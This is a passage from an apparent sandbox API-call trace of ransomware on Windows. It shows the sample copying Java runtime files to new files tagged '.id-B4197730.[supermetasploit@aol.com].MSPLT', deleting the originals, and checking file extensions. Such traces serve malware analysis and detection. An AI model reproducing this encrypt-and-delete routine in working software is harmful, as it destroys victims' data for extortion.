lpNumberOfBytesWritten=0x335fc94*=0x10d40, lpOverlapped=0x0) returned 1 [0304.090] ReadFile (in: hFile=0x4f0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0304.090] WriteFile (in: hFile=0x518, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xe6, lpOverlapped=0x0) returned 1 [0304.090] SetEndOfFile (hFile=0x518) returned 1 [0304.090] CloseHandle (hObject=0x518) returned 1 [0304.096] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0304.096] SetEndOfFile (hFile=0x4f0) returned 1 [0304.103] CloseHandle (hObject=0x4f0) returned 1 [0304.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0304.873] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar")) returned 1 [0305.124] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.124] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.124] lstrlenW (lpString=".doc") returned 4 [0305.125] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0305.125] lstrlenW (lpString=".docx") returned 5 [0305.125] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0305.125] lstrlenW (lpString=".pdf") returned 4 [0305.125] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0305.125] lstrlenW (lpString=".xls") returned 4 [0305.125] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0305.125] lstrlenW (lpString=".xlsx") returned 5 [0305.125] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0305.125] lstrlenW (lpString=".ppt") returned 4 [0305.125] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0305.125] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.125] lstrlenW (lpString=".zip") returned 4 [0305.125] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0305.125] lstrlenW (lpString=".rar") returned 4 [0305.125] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0305.125] lstrlenW (lpString=".bz2") returned 4 [0305.125] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0305.125] lstrlenW (lpString=".7z") returned 3 [0305.125] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0305.125] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.125] lstrlenW (lpString=".dbf") returned 4 [0305.125] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0305.125] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.125] lstrlenW (lpString=".1cd") returned 4 [0305.126] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0305.126] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.126] lstrlenW (lpString=".jpg") returned 4 [0305.126] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.126] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.126] lstrlenW (lpString=".doc") returned 4 [0305.126] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0305.126] lstrlenW (lpString=".docx") returned 5 [0305.126] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0305.126] lstrlenW (lpString=".pdf") returned 4 [0305.126] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString=".xls") returned 4 [0305.126] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString=".xlsx") returned 5 [0305.126] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0305.126] lstrlenW (lpString=".ppt") returned 4 [0305.126] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.126] lstrlenW (lpString=".zip") returned 4 [0305.126] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString=".rar") returned 4 [0305.126] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0305.126] lstrlenW (lpString=".bz2") returned 4 [0305.126] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0305.127] lstrlenW (lpString=".7z") returned 3 [0305.127] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0305.127] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.127] lstrlenW (lpString=".dbf") returned 4 [0305.127] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0305.127] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.127] lstrlenW (lpString=".1cd") returned 4 [0305.127] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0305.127] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 52 [0305.127] lstrlenW (lpString=".jpg") returned 4 [0305.127] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0305.127] lstrcmpiW (lpString1=".bfc", lpString2=".MSPLT") returned -1 [0305.127] lstrlenW (lpString="fontconfig.bfc") returned 14 [0305.127] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0305.482] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3770) returned 1 [0305.482] CloseHandle (hObject=0x3e4) returned 1 [0305.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc")) returned 0x20 [0306.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.954] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0306.954] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.954] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.954] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0306.956] GetLastError () returned 0x0 [0306.956] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xeba, lpOverlapped=0x0) returned 1 [0306.958] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec0, lpOverlapped=0x0) returned 1 [0306.959] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.959] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xf0, lpOverlapped=0x0) returned 1 [0306.960] SetEndOfFile (hFile=0x534) returned 1 [0306.960] CloseHandle (hObject=0x534) returned 1 [0306.993] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.993] SetEndOfFile (hFile=0x470) returned 1 [0307.002] CloseHandle (hObject=0x470) returned 1 [0307.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0307.003] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc")) returned 1 [0307.006] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.007] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.007] lstrlenW (lpString=".doc") returned 4 [0307.007] lstrcmpiW (lpString1=".doc", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".docx") returned 5 [0307.007] lstrcmpiW (lpString1=".docx", lpString2="g.bfc") returned -1 [0307.007] lstrlenW (lpString=".pdf") returned 4 [0307.007] lstrcmpiW (lpString1=".pdf", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".xls") returned 4 [0307.007] lstrcmpiW (lpString1=".xls", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".xlsx") returned 5 [0307.007] lstrcmpiW (lpString1=".xlsx", lpString2="g.bfc") returned -1 [0307.007] lstrlenW (lpString=".ppt") returned 4 [0307.007] lstrcmpiW (lpString1=".ppt", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.007] lstrlenW (lpString=".zip") returned 4 [0307.007] lstrcmpiW (lpString1=".zip", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".rar") returned 4 [0307.007] lstrcmpiW (lpString1=".rar", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".bz2") returned 4 [0307.007] lstrcmpiW (lpString1=".bz2", lpString2=".bfc") returned 1 [0307.007] lstrlenW (lpString=".7z") returned 3 [0307.007] lstrcmpiW (lpString1=".7z", lpString2="bfc") returned -1 [0307.007] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.007] lstrlenW (lpString=".dbf") returned 4 [0307.008] lstrcmpiW (lpString1=".dbf", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.008] lstrlenW (lpString=".1cd") returned 4 [0307.008] lstrcmpiW (lpString1=".1cd", lpString2=".bfc") returned -1 [0307.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.008] lstrlenW (lpString=".jpg") returned 4 [0307.008] lstrcmpiW (lpString1=".jpg", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.008] lstrlenW (lpString=".doc") returned 4 [0307.008] lstrcmpiW (lpString1=".doc", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString=".docx") returned 5 [0307.008] lstrcmpiW (lpString1=".docx", lpString2="g.bfc") returned -1 [0307.008] lstrlenW (lpString=".pdf") returned 4 [0307.008] lstrcmpiW (lpString1=".pdf", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString=".xls") returned 4 [0307.008] lstrcmpiW (lpString1=".xls", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString=".xlsx") returned 5 [0307.008] lstrcmpiW (lpString1=".xlsx", lpString2="g.bfc") returned -1 [0307.008] lstrlenW (lpString=".ppt") returned 4 [0307.008] lstrcmpiW (lpString1=".ppt", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.008] lstrlenW (lpString=".zip") returned 4 [0307.008] lstrcmpiW (lpString1=".zip", lpString2=".bfc") returned 1 [0307.008] lstrlenW (lpString=".rar") returned 4 [0307.009] lstrcmpiW (lpString1=".rar", lpString2=".bfc") returned 1 [0307.009] lstrlenW (lpString=".bz2") returned 4 [0307.009] lstrcmpiW (lpString1=".bz2", lpString2=".bfc") returned 1 [0307.009] lstrlenW (lpString=".7z") returned 3 [0307.009] lstrcmpiW (lpString1=".7z", lpString2="bfc") returned -1 [0307.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.009] lstrlenW (lpString=".dbf") returned 4 [0307.009] lstrcmpiW (lpString1=".dbf", lpString2=".bfc") returned 1 [0307.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.009] lstrlenW (lpString=".1cd") returned 4 [0307.009] lstrcmpiW (lpString1=".1cd", lpString2=".bfc") returned -1 [0307.009] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 53 [0307.009] lstrlenW (lpString=".jpg") returned 4 [0307.009] lstrcmpiW (lpString1=".jpg", lpString2=".bfc") returned 1 [0307.009] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0307.009] lstrlenW (lpString="LucidaBrightItalic.ttf") returned 22 [0307.009] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0307.012] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=80856) returned 1 [0307.012] CloseHandle (hObject=0x470) returned 1 [0307.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf")) returned 0x20 [0307.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.013] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0307.013] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.013] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.013] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0307.014] GetLastError () returned 0x0 [0307.014] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x13bd8, lpOverlapped=0x0) returned 1 [0307.587] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x13be0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x13be0, lpOverlapped=0x0) returned 1 [0307.591] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.591] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x100, lpOverlapped=0x0) returned 1 [0307.591] SetEndOfFile (hFile=0x534) returned 1 [0307.592] CloseHandle (hObject=0x534) returned 1 [0307.600] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.600] SetEndOfFile (hFile=0x470) returned 1 [0307.610] CloseHandle (hObject=0x470) returned 1 [0307.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0307.611] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf")) returned 1 [0307.612] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.612] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.612] lstrlenW (lpString=".doc") returned 4 [0307.612] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.612] lstrlenW (lpString=".docx") returned 5 [0307.612] lstrcmpiW (lpString1=".docx", lpString2="c.ttf") returned -1 [0307.612] lstrlenW (lpString=".pdf") returned 4 [0307.612] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.612] lstrlenW (lpString=".xls") returned 4 [0307.612] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.612] lstrlenW (lpString=".xlsx") returned 5 [0307.612] lstrcmpiW (lpString1=".xlsx", lpString2="c.ttf") returned -1 [0307.612] lstrlenW (lpString=".ppt") returned 4 [0307.612] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.612] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.612] lstrlenW (lpString=".zip") returned 4 [0307.612] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.612] lstrlenW (lpString=".rar") returned 4 [0307.613] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.613] lstrlenW (lpString=".bz2") returned 4 [0307.613] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.613] lstrlenW (lpString=".7z") returned 3 [0307.613] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.613] lstrlenW (lpString=".dbf") returned 4 [0307.613] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.613] lstrlenW (lpString=".1cd") returned 4 [0307.613] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.613] lstrlenW (lpString=".jpg") returned 4 [0307.613] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.613] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.614] lstrlenW (lpString=".doc") returned 4 [0307.614] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.614] lstrlenW (lpString=".docx") returned 5 [0307.614] lstrcmpiW (lpString1=".docx", lpString2="c.ttf") returned -1 [0307.614] lstrlenW (lpString=".pdf") returned 4 [0307.614] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.614] lstrlenW (lpString=".xls") returned 4 [0307.614] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.614] lstrlenW (lpString=".xlsx") returned 5 [0307.614] lstrcmpiW (lpString1=".xlsx", lpString2="c.ttf") returned -1 [0307.614] lstrlenW (lpString=".ppt") returned 4 [0307.614] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.614] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.614] lstrlenW (lpString=".zip") returned 4 [0307.614] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.614] lstrlenW (lpString=".rar") returned 4 [0307.614] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.614] lstrlenW (lpString=".bz2") returned 4 [0307.614] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.615] lstrlenW (lpString=".7z") returned 3 [0307.615] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.615] lstrlenW (lpString=".dbf") returned 4 [0307.615] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.615] lstrlenW (lpString=".1cd") returned 4 [0307.615] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf") returned 67 [0307.615] lstrlenW (lpString=".jpg") returned 4 [0307.615] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.615] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0307.615] lstrlenW (lpString="LucidaSansRegular.ttf") returned 21 [0307.615] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0307.616] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=698236) returned 1 [0307.616] CloseHandle (hObject=0x470) returned 1 [0307.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf")) returned 0x20 [0307.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.617] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0307.617] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.617] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.617] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0307.618] GetLastError () returned 0x0 [0307.618] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xaa77c, lpOverlapped=0x0) returned 1 [0307.928] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xaa780, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xaa780, lpOverlapped=0x0) returned 1 [0307.943] ReadFile (in: hFile=0x470, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.943] WriteFile (in: hFile=0x534, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfe, lpOverlapped=0x0) returned 1 [0307.943] SetEndOfFile (hFile=0x534) returned 1 [0307.943] CloseHandle (hObject=0x534) returned 1 [0308.556] 